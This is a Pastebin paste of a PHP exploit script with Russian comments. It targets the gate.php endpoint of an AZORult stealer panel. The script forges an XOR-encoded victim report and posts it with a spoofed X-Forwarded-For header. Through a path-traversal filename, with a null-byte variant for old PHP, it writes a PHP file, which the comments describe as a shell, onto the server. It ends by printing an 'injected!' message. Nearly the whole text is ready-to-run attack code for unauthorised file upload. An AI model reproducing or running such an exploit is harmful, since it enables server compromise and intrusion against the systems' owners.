Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /////////////
- // Адрес гейта
- $url="http://azorult30/gate.php";
- $filename = "/../../q.php";//Заливка шелла на кривых apache
- //$filename = "/../../q.php\0";//Заливка шелла на php 5.2
- //////////////
- ///
- /// Дальше не трогать - магия
- ///
- $guid = "EDSER93-1EDA-4W4C-BEED-WNFYRIFHBF4C04CFEW99-FES9-4558-9FEF-HFDIUFG6D851";
- $payload ="reportdata=<info".$guid.">".$filename."|6.1|Windows 7 Ultimate|x64| User-PC|Admin|0|0|0|0|E|A</info".$guid.">
- <pwds".$guid.">
- 1|kek|http://anonchik.com|tobi|pizda|admin|pass\r\n
- </pwds".$guid.">
- <coks".$guid.">
- </coks".$guid.">
- <list".$guid.">
- </list".$guid.">
- <file".$guid."><?php echo 'PWNED!';>
- </file".$guid.">";
- $xorkey = chr(254).chr(41).chr(54);
- $data=CB_XORm($payload, $xorkey, 1024*512);
- function httpPost($url, $data){
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_POST, true);
- curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: '.rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255)));
- $response = curl_exec($curl);
- curl_close($curl);
- return $response;
- }
- function CB_XORm($data, $key, $max){
- $datalen=strlen($data);
- $keylen=strlen($key);
- if ($datalen>=$max) $datalen=$max;
- $j=0;
- for($i=0;$i<$datalen; $i++){
- $data[$i] = chr(ord($data[$i])^ord($key[$j]));
- $j++;
- if($j>($keylen-1)) $j=0;
- }
- return $data;
- }
- $otvet = httpPost($url, $data);
- echo $url." injected!<br>";
- echo $otvet;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement